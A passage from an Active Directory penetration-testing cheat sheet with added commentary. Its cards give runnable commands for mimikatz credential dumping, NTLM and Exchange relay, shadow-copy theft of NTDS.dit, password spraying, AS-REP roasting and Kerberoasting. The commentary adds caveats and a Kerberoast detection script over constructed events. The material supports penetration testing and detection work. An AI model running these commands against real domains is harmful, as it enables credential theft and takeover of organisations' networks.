    4. .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::secrets" "exit"
    5. proxychains evil-winrm -u Administrator -p 'pass dumped in step 4' -i 10.100.10.100 -P 6666
The card relies on credentials dumped from the first DC being valid on a DC of a trusting domain; the original prints the mimikatz command with spaces inside the module names.

NTLM RELAY
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: NTLM

    1. responder -I eth1 -v
    2. ntlmrelayx.py …
Turn off Responder's SMB and HTTP servers in Responder.conf first, otherwise they capture the authentication that ntlmrelayx should be relaying. Relaying to SMB only works against targets that do not require SMB signing.

EXCHANGE RELAY
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: NTLM

    1. responder -I eth1 -v
    2. ./exchangeRelayx.py …
Same Responder.conf caveat as NTLM RELAY. ExchangeRelayX relays the captured NTLM authentication to Exchange Web Services, which yields access to the victim's mailbox rather than code execution.

DUMPING WITH DISKSHADOW
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Dumping

    1. priv.txt contains:
       SET CONTEXT PERSISTENT NOWRITERSp
       add volume c: alias 0xprashantp
       createp
       expose %0xprashant% z:p
    2. diskshadow /s priv.txt
The trailing p on every line is deliberate in the recipe the card copies (note the alias is written 0xprashantp but referenced as %0xprashant%): diskshadow is reported to drop the last character of each script line read from a file, and the padding keeps the real command intact. The exposed z: drive is what ESCALATE WITH SEBACKUPPRIVILEGE copies ntds.dit from; diskshadow itself needs administrative or backup rights.

DUMPING WITH VSSADMIN
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Dumping

    vssadmin create shadow /for=C:
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
Use the shadow copy volume name that vssadmin prints (HarddiskVolumeShadowCopy1 is only the first one ever created); the SYSTEM hive is needed to decrypt NTDS.dit. Run from an elevated prompt on the DC. The original runs the kerbrute line of the next card into this one.

PASSWORD SPRAYING
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Spraying

    ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
One password per round across all users; check the lockout policy first (net accounts /domain) so the spray stays below the threshold. Kerberos pre-authentication failures show up as event 4771 on the DC.

AS-REP ROASTING
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Kerberos

    .\Rubeus.exe asreproast
Only accounts with "Do not require Kerberos preauthentication" set are affected; /format:hashcat writes the hashes in a form hashcat's mode 18200 cracks.

KERBEROASTING
Domain: Yes | Local Admin: Y/N | OS: Windows | Type: Kerberos

    GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
    crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --kerberoast output.txt
Any domain account can request these service tickets; the hashes are cracked offline (hashcat mode 13100 for RC4 tickets), so the defence is long random passwords on service accounts and AES-only tickets. The domain, user and password in the first line are the sample values the original prints.

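As an added example (not part of the Hadess sheet), the detection side of this card: a filter over domain controller ticket events that flags accounts requesting several RC4 service tickets, which is what Rubeus, GetUserSPNs.py and crackmapexec above produce. The one-line key=value rendering of the events, the CORP.LOCAL domain, the account names and the service names are constructed for the example; real 4769 events come from the DC security log (wevtutil, Get-WinEvent or a SIEM export) and carry the same fields.

```shell
#!/usr/bin/env bash
# Added example (not from the Hadess sheet): Kerberoast detection sketch.
# Event 4769 (TGS request) with TicketEncryptionType 0x17 (RC4-HMAC) for a
# service other than krbtgt or a computer account is the classic signal; many
# of them from one account in a short window is a roasting tool at work.

# Constructed events: a simplified key=value rendering of 4769/4768 fields.
SAMPLE_EVENTS='2024-03-01T10:00:01 EventID=4769 Account=alice@CORP.LOCAL Service=krbtgt EncType=0x12 Status=0x0
2024-03-01T10:00:05 EventID=4769 Account=alice@CORP.LOCAL Service=cifs/fs01.corp.local EncType=0x12 Status=0x0
2024-03-01T10:02:10 EventID=4769 Account=bob@CORP.LOCAL Service=MSSQLSvc/db01.corp.local:1433 EncType=0x17 Status=0x0
2024-03-01T10:02:10 EventID=4769 Account=bob@CORP.LOCAL Service=HTTP/web01.corp.local EncType=0x17 Status=0x0
2024-03-01T10:02:11 EventID=4769 Account=bob@CORP.LOCAL Service=svc_backup EncType=0x17 Status=0x0
2024-03-01T10:02:11 EventID=4769 Account=bob@CORP.LOCAL Service=WS01$ EncType=0x17 Status=0x0
2024-03-01T10:03:00 EventID=4768 Account=carol@CORP.LOCAL Service=krbtgt EncType=0x17 Status=0x0
2024-03-01T10:05:00 EventID=4769 Account=dave@CORP.LOCAL Service=HTTP/legacy.corp.local EncType=0x17 Status=0x0'

# Distinct RC4 service tickets per account before we report it.
THRESHOLD=3

# Read events on stdin; print "<account> <count>" for every account that
# requested at least THRESHOLD distinct non-krbtgt, non-computer services
# with RC4 encryption in 4769 events.
kerberoast_suspects() {
    awk -v thr="$THRESHOLD" '
        # Look up a key=value field in the current record.
        function field(name,   i, kv) {
            for (i = 1; i <= NF; i++) {
                split($i, kv, "=")
                if (kv[1] == name) return kv[2]
            }
            return ""
        }
        field("EventID") == "4769" && field("EncType") == "0x17" {
            svc = field("Service"); acct = field("Account")
            if (svc == "krbtgt" || svc ~ /\$$/) next   # TGT and machine accounts are noise
            if (!((acct, svc) in seen)) { seen[acct, svc] = 1; n[acct]++ }
        }
        END { for (a in n) if (n[a] >= thr) printf "%s %d\n", a, n[a] }'
}

printf '%s\n' "$SAMPLE_EVENTS" | kerberoast_suspects
```

In the constructed sample only bob trips the rule (three distinct RC4 service tickets; the WS01$ request is ignored), alice requests AES tickets and dave a single legacy one. The AS-REP ROASTING card leaves a different trace, 4768 with pre-authentication type 0, which this filter does not cover; and once the domain enforces AES, any 0x17 ticket at all becomes worth a look, so the threshold can drop to 1.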
About Hadess
Savior of your Business to combat cyber threats

Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.

Contact Us
To request additional information about Hadess's services, please fill out the form below. A Hadess representative will contact you shortly.
Website: www.hadess.io
Email: [email protected]
Phone No.: +989362181112
Company No.: +982128427515, +982177873383
hadess_security

Products and Services
SAST | Audit Your Products: Identifying and helping to address hidden weaknesses in your Applications.
RASP | Protect Applications and APIs Anywhere: Identifying and helping to address hidden weaknesses in your organization's security.
Penetration Testing | PROTECTION PRO: Fully assess your organization's threat detection and response capabilities with a simulated cyber-attack.
Red Teaming Operation | PROTECTION PRO: Fully assess your organization's threat detection and response capabilities with a simulated cyber-attack.

HADESS
Secure Agile Development